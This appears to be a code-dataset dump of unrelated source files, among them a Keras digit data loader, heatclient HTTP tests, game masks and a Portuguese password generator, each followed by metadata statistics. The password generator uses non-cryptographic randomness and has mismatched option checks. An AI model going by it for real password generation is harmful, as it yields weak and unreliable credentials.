return "1062463862338-1sbchodlc6j0r5n87p2i0dakq9gd83rp.apps.googleusercontent.com" | 57 | 86 | 0.859649 | 11 | 114 | 8.636364 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224299 | 0.061404 | 114 | 2 | 86 | 57 | 0.663551 | 0 | 0 | 0 | 0 | 0 | 0.634783 | 0.634783 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
fda74355479840586aa12423283ccd13b8ca1765 | 6,441 | py | Python | src/multi_digit_dataloader.py | aashishkumar0228/multi-mnist | 51bf05a6033cc9ad55352ee36250c6060e5bbbaf | [
"MIT"
] | null | null | null | src/multi_digit_dataloader.py | aashishkumar0228/multi-mnist | 51bf05a6033cc9ad55352ee36250c6060e5bbbaf | [
"MIT"
] | null | null | null | src/multi_digit_dataloader.py | aashishkumar0228/multi-mnist | 51bf05a6033cc9ad55352ee36250c6060e5bbbaf | [
"MIT"
] | null | null | null | import cv2
import numpy as np
import pandas as pd
import tensorflow as tf
class MultiDigitDataLoader(tf.keras.utils.Sequence):
def __init__(self,
df_path,
image_base_path,
batch_size,
img_height,
img_width,
num_time_steps,
transform,
max_digit_length=8,
shuffle=True):
'''
df_path: path for dataframe which has file_name and labels
image_base_path: folder where images are
batch_size: batch_size while training
img_height: height of image
img_width: width of image
num_time_steps = number of input time steps for lstm layer
'''
self.batch_size = int(batch_size)
self.image_base_path = image_base_path
self.shuffle = shuffle
self.max_digit_length = max_digit_length
self.img_height = img_height
self.img_width = img_width
self.num_time_steps = num_time_steps
self.transform = transform
self.char_to_int_map = {'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10}
self.df = pd.read_csv(df_path, header = None, dtype={0: str, 1: str})
self.df.columns = ["file_name", "labels"]
self.df['y_true'] = self.df['labels'].apply(self.create_y_true)
self.df['label_length'] = self.df['labels'].apply(self.get_label_length)
## shuffle the df
if self.shuffle:
self.df = self.df.sample(frac=1).reset_index(drop=True)
def create_y_true(self, label):
y_true = np.ones([1,self.max_digit_length]) * (-1)
# num_list = [int(char) for char in label]
num_list = [self.char_to_int_map[char] for char in label]
y_true[0, 0:len(label)] = num_list
return y_true
def get_label_length(self, label):
return len(label)
def on_epoch_end(self):
if self.shuffle:
self.df = self.df.sample(frac=1).reset_index(drop=True)
def __len__(self):
return int(np.ceil(len(self.df) / float(self.batch_size)))
def get_image(self, filename):
img = cv2.imread(filename, 0)
img = self.transform(image=img)["image"]
img = img.reshape((self.img_height, self.img_width, 1))
return img
def __getitem__(self, idx):
idx_start = idx * self.batch_size
idx_end = min((idx + 1) * self.batch_size, len(self.df))
y_train = np.concatenate(self.df['y_true'][idx_start:idx_end].values,axis=0)
x_train = [self.get_image(self.image_base_path + self.df['file_name'][i]) for i in range(idx_start,idx_end)]
x_train = np.array(x_train)
x_train = np.transpose(x_train, axes=[0,2,1,3])
input_length_arr = self.num_time_steps * np.ones(shape=(idx_end - idx_start, 1), dtype="int64")
label_length_arr = self.df['label_length'][idx_start:idx_end].values.reshape(idx_end - idx_start,1)
inputs = {'image': x_train,
'label': y_train,
'input_length': input_length_arr,
'label_length': label_length_arr,
}
return inputs
class MultiDigitDataLoaderActualShape(tf.keras.utils.Sequence):
def __init__(self,
df_path,
image_base_path,
num_time_steps,
transform,
max_digit_length=3,
shuffle=True):
'''
df_path: path for dataframe which has file_name and labels
image_base_path: folder where images are
batch_size: batch_size while training
img_height: height of image
img_width: width of image
num_time_steps = number of input time steps for lstm layer
'''
self.batch_size = 1 # int(batch_size)
self.image_base_path = image_base_path
self.shuffle = shuffle
self.max_digit_length = max_digit_length
self.num_time_steps = num_time_steps
self.transform = transform
self.char_to_int_map = {'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10}
self.df = pd.read_csv(df_path, header = None, dtype={0: str, 1: str})
self.df.columns = ["file_name", "labels"]
self.df['y_true'] = self.df['labels'].apply(self.create_y_true)
self.df['label_length'] = self.df['labels'].apply(self.get_label_length)
## shuffle the df
if self.shuffle:
self.df = self.df.sample(frac=1).reset_index(drop=True)
def create_y_true(self, label):
y_true = np.ones([1,self.max_digit_length]) * (-1)
# num_list = [int(char) for char in label]
num_list = [self.char_to_int_map[char] for char in label]
y_true[0, 0:len(label)] = num_list
return y_true
def get_label_length(self, label):
return len(label)
def on_epoch_end(self):
if self.shuffle:
self.df = self.df.sample(frac=1).reset_index(drop=True)
def __len__(self):
return int(np.ceil(len(self.df) / float(self.batch_size)))
def get_image(self, filename):
img = cv2.imread(filename, 0)
img = self.transform(image=img)["image"]
img_height = img.shape[0]
img_width = img.shape[1]
img = img.reshape((img_height, img_width, 1))
return img
def __getitem__(self, idx):
idx_start = idx * self.batch_size
idx_end = min((idx + 1) * self.batch_size, len(self.df))
y_train = np.concatenate(self.df['y_true'][idx_start:idx_end].values,axis=0)
x_train = [self.get_image(self.image_base_path + self.df['file_name'][i]) for i in range(idx_start,idx_end)]
x_train = np.array(x_train)
x_train = np.transpose(x_train, axes=[0,2,1,3])
input_length_arr = self.num_time_steps * np.ones(shape=(idx_end - idx_start, 1), dtype="int64")
label_length_arr = self.df['label_length'][idx_start:idx_end].values.reshape(idx_end - idx_start,1)
inputs = {'image': x_train,
'label': y_train,
'input_length': input_length_arr,
'label_length': label_length_arr,
}
return inputs | 37.666667 | 116 | 0.583139 | 911 | 6,441 | 3.854007 | 0.132821 | 0.054685 | 0.037026 | 0.023925 | 0.933068 | 0.923384 | 0.923384 | 0.903446 | 0.903446 | 0.903446 | 0 | 0.020354 | 0.298246 | 6,441 | 171 | 117 | 37.666667 | 0.756416 | 0.097811 | 0 | 0.820513 | 0 | 0 | 0.044726 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119658 | false | 0 | 0.034188 | 0.034188 | 0.25641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e32ce0effe965979cdf1a80e1ff62d67b7fa7af7 | 10,924 | py | Python | tests/test_common_http.py | CiscoSystems/python-heatclient | 3740ae9fcb1ed4dc39796ceccbf0e7000be71002 | [
"Apache-2.0"
] | null | null | null | tests/test_common_http.py | CiscoSystems/python-heatclient | 3740ae9fcb1ed4dc39796ceccbf0e7000be71002 | [
"Apache-2.0"
] | null | null | null | tests/test_common_http.py | CiscoSystems/python-heatclient | 3740ae9fcb1ed4dc39796ceccbf0e7000be71002 | [
"Apache-2.0"
] | null | null | null | import StringIO
import os
import httplib2
import httplib
import sys
import mox
import unittest
try:
import json
except ImportError:
import simplejson as json
from keystoneclient.v2_0 import client as ksclient
from heatclient import exc
from heatclient.common import http
import fakes
class HttpClientTest(unittest.TestCase):
# Patch os.environ to avoid required auth info.
def setUp(self):
self.m = mox.Mox()
self.m.StubOutClassWithMocks(http.httplib, 'HTTPConnection')
self.m.StubOutClassWithMocks(http.httplib, 'HTTPSConnection')
def tearDown(self):
self.m.UnsetStubs()
self.m.ResetAll()
def test_http_raw_request(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/octet-stream',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/octet-stream'},
''))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.raw_request('GET', '')
self.assertEqual(resp.status, 200)
self.assertEqual(''.join([x for x in body]), '')
self.m.VerifyAll()
def test_http_json_request(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '')
self.assertEqual(resp.status, 200)
self.assertEqual(body, {})
self.m.VerifyAll()
def test_http_json_request_w_req_body(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/', body='"test-body"',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '', body='test-body')
self.assertEqual(resp.status, 200)
self.assertEqual(body, {})
self.m.VerifyAll()
def test_http_json_request_non_json_resp_cont_type(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/', body='"test-body"',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'not/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '', body='test-body')
self.assertEqual(resp.status, 200)
self.assertEqual(body, None)
self.m.VerifyAll()
def test_http_json_request_invalid_json(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/json'},
'invalid-json'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '')
self.assertEqual(resp.status, 200)
self.assertEqual(body, 'invalid-json')
self.m.VerifyAll()
def test_http_json_request_redirect(self):
# Record the 302
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(302, 'Found',
{'location': 'http://example.com:8004'
}, ''))
# Record the following 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '')
self.assertEqual(resp.status, 200)
self.assertEqual(body, {})
self.m.VerifyAll()
def test_http_json_request_prohibited_redirect(self):
# Record the 302
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(302, 'Found',
{'location': 'http://prohibited.example.com:8004'
}, ''))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
self.assertRaises(exc.InvalidEndpoint, client.json_request, 'GET', '')
self.m.VerifyAll()
def test_http_404_json_request(self):
# Record a 404
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(404, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
self.assertRaises(exc.HTTPNotFound, client.json_request, 'GET', '')
self.m.VerifyAll()
def test_http_300_json_request(self):
# Record a 300
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(300, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
self.assertRaises(exc.HTTPMultipleChoices, client.json_request, 'GET', '')
self.m.VerifyAll()
#def test_https_json_request(self):
# # Record a 200
# mock_conn = http.httplib.HTTPSConnection('example.com', 8004,
# '', timeout=600.0)
# mock_conn.request('GET', '/',
# headers={'Content-Type': 'application/json',
# 'Accept': 'application/json',
# 'User-Agent': 'python-heatclient'})
# mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
# {'content-type': 'application/json'},
# '{}'))
# # Replay, create client, assert
# self.m.ReplayAll()
# client = http.HTTPClient('https://example.com:8004', ca_file='dummy',
# cert_file='dummy',
# key_file='dummy')
# resp, body = client.json_request('GET', '')
# self.assertEqual(resp.status, 200)
# self.assertEqual(body, {})
# self.m.VerifyAll()
def test_fake_json_request(self):
self.assertRaises(exc.InvalidEndpoint, http.HTTPClient, 'fake://example.com:8004')
| 47.495652 | 90 | 0.496064 | 961 | 10,924 | 5.540062 | 0.118626 | 0.049587 | 0.06311 | 0.08302 | 0.851991 | 0.825695 | 0.825695 | 0.825695 | 0.812171 | 0.789068 | 0 | 0.034553 | 0.374771 | 10,924 | 229 | 91 | 47.703057 | 0.744949 | 0.134291 | 0 | 0.707602 | 0 | 0 | 0.169022 | 0.007543 | 0 | 0 | 0 | 0 | 0.093567 | 1 | 0.070175 | false | 0 | 0.081871 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e33c8e65e63343f2d0b7a5e444dfc282f0597b5a | 1,688 | py | Python | python/lib/masks.py | omardelarosa/godot-python-demo-game | c9c91b2a8e838c315dae6d6d597ce75a20318747 | [
"CC-BY-3.0"
] | null | null | null | python/lib/masks.py | omardelarosa/godot-python-demo-game | c9c91b2a8e838c315dae6d6d597ce75a20318747 | [
"CC-BY-3.0"
] | null | null | null | python/lib/masks.py | omardelarosa/godot-python-demo-game | c9c91b2a8e838c315dae6d6d597ce75a20318747 | [
"CC-BY-3.0"
] | null | null | null | from python.lib.board_state import BoardState
CROSS_MASK = {
"mask": [
[None, BoardState.FILLED_TILE, None],
[
BoardState.FILLED_TILE,
BoardState.MASK_DEFAULT_PIVOT_VALUE,
BoardState.FILLED_TILE,
],
[None, BoardState.FILLED_TILE, None],
[None, BoardState.FILLED_TILE, None],
],
"shape": (3, 4),
}
SWORD_MASK = {
"mask": [
[None, BoardState.FILLED_TILE, None],
[
BoardState.FILLED_TILE,
BoardState.MASK_DEFAULT_PIVOT_VALUE,
BoardState.FILLED_TILE,
],
[None, BoardState.FILLED_TILE, None],
],
"shape": (3, 3),
}
SPEAR_MASK = {
"mask": [
[None, None, BoardState.FILLED_TILE, None, None],
[None, None, BoardState.FILLED_TILE, None, None],
[
BoardState.FILLED_TILE,
BoardState.FILLED_TILE,
BoardState.MASK_DEFAULT_PIVOT_VALUE,
BoardState.FILLED_TILE,
BoardState.FILLED_TILE,
],
[None, None, BoardState.FILLED_TILE, None, None],
[None, None, BoardState.FILLED_TILE, None, None],
],
"shape": (5, 5),
}
X_MASK = {
"mask": [
[BoardState.FILLED_TILE, None, None, None, BoardState.FILLED_TILE],
[None, BoardState.FILLED_TILE, None, BoardState.FILLED_TILE, None],
[
None,
None,
BoardState.MASK_DEFAULT_PIVOT_VALUE,
None,
None,
],
[None, BoardState.FILLED_TILE, None, BoardState.FILLED_TILE, None],
[BoardState.FILLED_TILE, None, None, None, BoardState.FILLED_TILE],
],
"shape": (5, 5),
} | 26.793651 | 75 | 0.562204 | 168 | 1,688 | 5.39881 | 0.130952 | 0.441014 | 0.551268 | 0.502756 | 0.904079 | 0.880926 | 0.880926 | 0.867696 | 0.867696 | 0.759647 | 0 | 0.006938 | 0.316943 | 1,688 | 63 | 76 | 26.793651 | 0.779705 | 0 | 0 | 0.741379 | 0 | 0 | 0.021314 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017241 | 0 | 0.017241 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e359f989c26c7e9114b49542806b2253615ef0a1 | 196 | py | Python | {{cookiecutter.project_slug}}/python/tests/test_python_bindings.py | Wellidontcare/cookiecutter-cpp-project | 09988b1933b7695dfaac48b68b4060655b1b233a | [
"MIT"
] | 22 | 2021-01-15T19:05:54.000Z | 2022-03-26T06:21:27.000Z | {{cookiecutter.project_slug}}/python/tests/test_python_bindings.py | Wellidontcare/cookiecutter-cpp-project | 09988b1933b7695dfaac48b68b4060655b1b233a | [
"MIT"
] | 36 | 2020-12-09T13:26:33.000Z | 2022-03-08T10:08:17.000Z | {{cookiecutter.project_slug}}/python/tests/test_python_bindings.py | Wellidontcare/cookiecutter-cpp-project | 09988b1933b7695dfaac48b68b4060655b1b233a | [
"MIT"
] | 5 | 2021-11-08T22:50:06.000Z | 2022-03-06T23:55:17.000Z | import {{ cookiecutter.project_slug.replace("-", "") }}
def test_{{ cookiecutter.project_slug.replace("-", "_") }}():
assert {{ cookiecutter.project_slug.replace("-", "") }}.add_one(1) == 2
| 32.666667 | 75 | 0.627551 | 20 | 196 | 5.85 | 0.6 | 0.487179 | 0.589744 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011561 | 0.117347 | 196 | 5 | 76 | 39.2 | 0.66474 | 0 | 0 | 0 | 0 | 0 | 0.020408 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
e37d9136cdfd3482ac9902ca959c58daffc5b382 | 7,756 | py | Python | oldVersions/testPassGen(BetaTest).py | Pharaoh00/Pharaoh-Toolkit | 19692e4cf9a6b5ca9800526da8e6a85b5639290d | [
"MIT"
] | null | null | null | oldVersions/testPassGen(BetaTest).py | Pharaoh00/Pharaoh-Toolkit | 19692e4cf9a6b5ca9800526da8e6a85b5639290d | [
"MIT"
] | null | null | null | oldVersions/testPassGen(BetaTest).py | Pharaoh00/Pharaoh-Toolkit | 19692e4cf9a6b5ca9800526da8e6a85b5639290d | [
"MIT"
] | null | null | null | import random, string
import sys
def PassCustom(a,b,c,d):
try:
enter = ""
# Começo Bloco parametro A.
if a != enter and b == enter and c == enter and d == enter:
if a == "numero":
a = string.digits
if a == "upper":
a = string.ascii_uppercase
if a == "lower":
a = string.ascii_lowercase
if a == "espec":
a = string.punctuation
letterStore = a # Somente se A for diferent.
elif a != enter and b != enter and c == enter and d == enter:
if a == "numero":
a = string.digits
if a == "upper":
a = string.ascii_uppercase
if a == "lower":
a = string.ascii_lowercase
if a == "espec":
a = string.punctuation
if b == "numero":
b = string.digits
if b == "upper":
b = string.ascii_uppercase
if b == "lower":
b = string.ascii_lowercase
if b == "espec":
b = string.punctuation
letterStore = a + b
elif a != enter and b == enter and c != enter and d == enter:
if a == "numero":
a = string.digits
if a == "upper":
a = string.ascii_uppercase
if a == "lower":
a = string.ascii_lowercase
if a == "espec":
a = string.punctuation
if c == "numero":
c = string.digits
if c == "upper":
c = string.ascii_uppercase
if c == "lower":
c = string.ascii_lowercase
if c == "espec":
c = string.punctuation
letterStore = a + c
elif a != enter and b == enter and c == enter and d != enter:
if a == "numero":
a = string.digits
if a == "upper":
a = string.ascii_uppercase
if a == "lower":
a = string.ascii_lowercase
if a == "espec":
a = string.punctuation
if d == "numeros":
d = string.digits
if d == "upper":
d = string.ascii_uppercase
if d == "lower":
d = string.ascii_lowercase
if d == "espec":
d = string.punctuation
letterStore = a + d
elif a != enter and b != enter and c != enter and d == enter:
if a == "numero":
a = string.digits
if a == "upper":
a = string.ascii_uppercase
if a == "lower":
a = string.ascii_lowercase
if a == "espec":
a = string.punctuation
if b == "numeros":
b = string.digits
if b == "upper":
b = string.ascii_uppercase
if b == "lower":
b = string.ascii_lowercase
if b == "espec":
b = string.punctuation
if c == "numero":
c = string.digits
if c == "upper":
c = string.ascii_uppercase
if c == "lower":
c = string.ascii_lowercase
if c == "espec":
c = string.punctuation
letterStore = a + b + c
elif a != enter and b == enter and c != enter and d != enter:
if a == "numero":
a = string.digits
if a == "upper":
a = string.ascii_uppercase
if a == "lower":
a = string.ascii_lowercase
if a == "espec":
a = string.punctuation
if c == "numero":
c = string.digits
if c == "upper":
c = string.ascii_uppercase
if c == "lower":
c = string.ascii_lowercase
if c == "espec":
c = string.punctuation
if d == "numero":
d = string.digits
if d == "upper":
d = string.ascii_uppercase
if d == "lower":
d = string.ascii_lowercase
if d == "espec":
d = string.punctuation
letterStore = a + c + d
elif a != enter and b != enter and c != enter and d != enter:
if a == "numero":
a = string.digits
if a == "upper":
a = string.ascii_uppercase
if a == "lower":
a = string.ascii_lowercase
if a == "espec":
a = string.punctuation
if b == "numero":
b = string.digits
if b == "upper":
b = string.ascii_uppercase
if b == "lower":
b = string.ascii_lowercase
if b == "espec":
b = string.punctuation
if c == "numero":
c = string.digits
if c == "upper":
c = string.ascii_uppercase
if c == "lower":
c = string.ascii_lowercase
if c == "espec":
c = string.punctuation
if d == "numero":
d = string.digits
if d == "upper":
d = string.ascii_uppercase
if d == "lower":
d = string.ascii_lowercase
if d == "espec":
d = string.punctuation
letterStore = a + b + c + d
# Fim Bloco parametro A.
# Começo Bloco parametro B.
elif a == enter and b != enter and c == enter and d == enter:
if b == "numero":
b = string.digits
if b == "upper":
b = string.ascii_uppercase
if b == "lower":
b = string.ascii_lowercase
if b == "espec":
b = string.punctuation
letterStore = b # Somente se B for diferente.
elif a == enter and b != enter and c != enter and d == enter:
if b == "numero":
b = string.digits
if b == "upper":
b = string.ascii_uppercase
if b == "lower":
b = string.ascii_lowercase
if b == "espec":
b = string.punctuation
if c == "numero":
c = string.digits
if c == "upper":
c = string.ascii_uppercase
if c == "lower":
c = string.ascii_lowercase
if c == "espec":
c = string.punctuation
letterStore = b + c
elif a == enter and b != enter and c == enter and d != enter:
if b == "numero":
b = string.digits
if b == "upper":
b = string.ascii_uppercase
if b == "lower":
b = string.ascii_lowercase
if b == "espec":
b = string.punctuation
if d == "numero":
d = string.digits
if d == "upper":
d = string.ascii_uppercase
if d == "lower":
d = string.ascii_lowercase
if d == "espec":
d = string.punctuation
letterStore = b + d
elif a == enter and b != enter and c != enter and d != enter:
if b == "numero":
b = string.digits
if b == "upper":
b = string.ascii_uppercase
if b == "lower":
b = string.ascii_lowercase
if b == "espec":
b = string.punctuation
if c == "numero":
c = string.digits
if c == "upper":
c = string.ascii_uppercase
if c == "lower":
c = string.ascii_lowercase
if c == "espec":
c = string.punctuation
if d == "numero":
d = string.digits
if d == "upper":
d = string.ascii_uppercase
if d == "lower":
d = string.ascii_lowercase
if d == "espec":
d = string.punctuation
letterStore = b + c + d
# Fim Bloco parametro B.
# Começo Bloco parametro C.
elif a == enter and b == enter and c != enter and d == enter:
if c == "numero":
c = string.digits
if c == "upper":
c = string.ascii_uppercase
if c == "lower":
c = string.ascii_lowercase
if c == "espec":
c = string.punctuation
letterStore = c # Somente se C for diferente.
elif a == enter and b == enter and c != enter and d != enter:
if c == "numero":
c = string.digits
if c == "upper":
c = string.ascii_uppercase
if c == "lower":
c = string.ascii_lowercase
if c == "espec":
c = string.punctuation
if d == "numero":
d = string.digits
if d == "upper":
d = string.ascii_uppercase
if d == "lower":
d = string.ascii_lowercase
if d == "espec":
d = string.punctuation
letterStore = c + d
# Fim Bloco parametro C.
# Começo Bloco parametro D.
elif a == enter and b == enter and c == enter and d != enter:
if d == "numero":
d = string.digits
if d == "upper":
d = string.ascii_uppercase
if d == "lower":
d = string.ascii_lowercase
if d == "espec":
d = string.punctuation
letterStore = d # Somente se D for diferente.
# Fim Bloco parametro D.
print("".join(random.sample(letterStore, int(passGen))))
return True
except ValueError:
print("Provavelmente não tem tantos characteres quanto o tamanho final do valor.\nPor favor, adicione mais characteres ou tente um valor menor!")
except TypeError:
print("Você tem que passar algum argumento")
passGen = input("Quantos caracteres você deseja ter?: ")
if not passGen.isdigit():
print("Somente numeros")
else:
PassCustom(input("Slot 1: "),input("Slot 2: "),input("Slot 3: "),input("Slot 4: "))
| 24.466877 | 147 | 0.579938 | 1,100 | 7,756 | 4.036364 | 0.074545 | 0.143694 | 0.091441 | 0.143694 | 0.860586 | 0.855856 | 0.847072 | 0.847072 | 0.847072 | 0.847072 | 0 | 0.000718 | 0.282104 | 7,756 | 316 | 148 | 24.544304 | 0.796695 | 0.039453 | 0 | 0.833333 | 0 | 0.003623 | 0.116445 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003623 | false | 0.021739 | 0.007246 | 0 | 0.014493 | 0.014493 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e380e35787b1544e495b714b5bd6fbf96a653a26 | 141 | py | Python | librespot/player/codecs/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | [
"Apache-2.0"
] | null | null | null | librespot/player/codecs/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | [
"Apache-2.0"
] | null | null | null | librespot/player/codecs/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | [
"Apache-2.0"
] | null | null | null | from librespot.player.codecs.AudioQuality import AudioFile
from librespot.player.codecs.VorbisOnlyAudioQuality import VorbisOnlyAudioQuality
| 47 | 81 | 0.900709 | 14 | 141 | 9.071429 | 0.571429 | 0.204724 | 0.299213 | 0.393701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056738 | 141 | 2 | 82 | 70.5 | 0.954887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8b54a8016d387484377deec020f45963b0cfbd16 | 44,877 | py | Python | stackingGithub/examples/Santander/scripts/ikki_NN_1.py | corworldstarn/stacking | 6102e88d015c0247cdcba2ea9bb951dbe360fc96 | [
"MIT"
] | 204 | 2016-06-03T03:38:26.000Z | 2022-03-17T13:04:04.000Z | stackingGithub/examples/Santander/scripts/ikki_NN_1.py | corworldstarn/stacking | 6102e88d015c0247cdcba2ea9bb951dbe360fc96 | [
"MIT"
] | 41 | 2016-07-16T04:52:21.000Z | 2018-09-26T05:03:16.000Z | stackingGithub/examples/Santander/scripts/ikki_NN_1.py | corworldstarn/stacking | 6102e88d015c0247cdcba2ea9bb951dbe360fc96 | [
"MIT"
] | 76 | 2017-02-08T14:22:20.000Z | 2022-02-03T02:06:42.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#Genaral packages
import os, sys
import pandas as pd
import numpy as np
sys.path.append(os.getcwd())
#os.chdir('/Users/IkkiTanaka/Documents/kaggle/Santander/')
#各種PATH
from stacking.base import FOLDER_NAME, PATH, INPUT_PATH, OUTPUT_PATH, ORIGINAL_TRAIN_FORMAT, SUBMIT_FORMAT
np.random.seed(407)
#keras
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.utils import np_utils
from keras.layers.advanced_activations import LeakyReLU, PReLU
from keras.layers.normalization import BatchNormalization
from keras.regularizers import l1, l2, l1l2, activity_l2
#base_ver2 utils
from stacking.base import load_data, save_pred_as_submit_format, create_cv_id
#classifiers
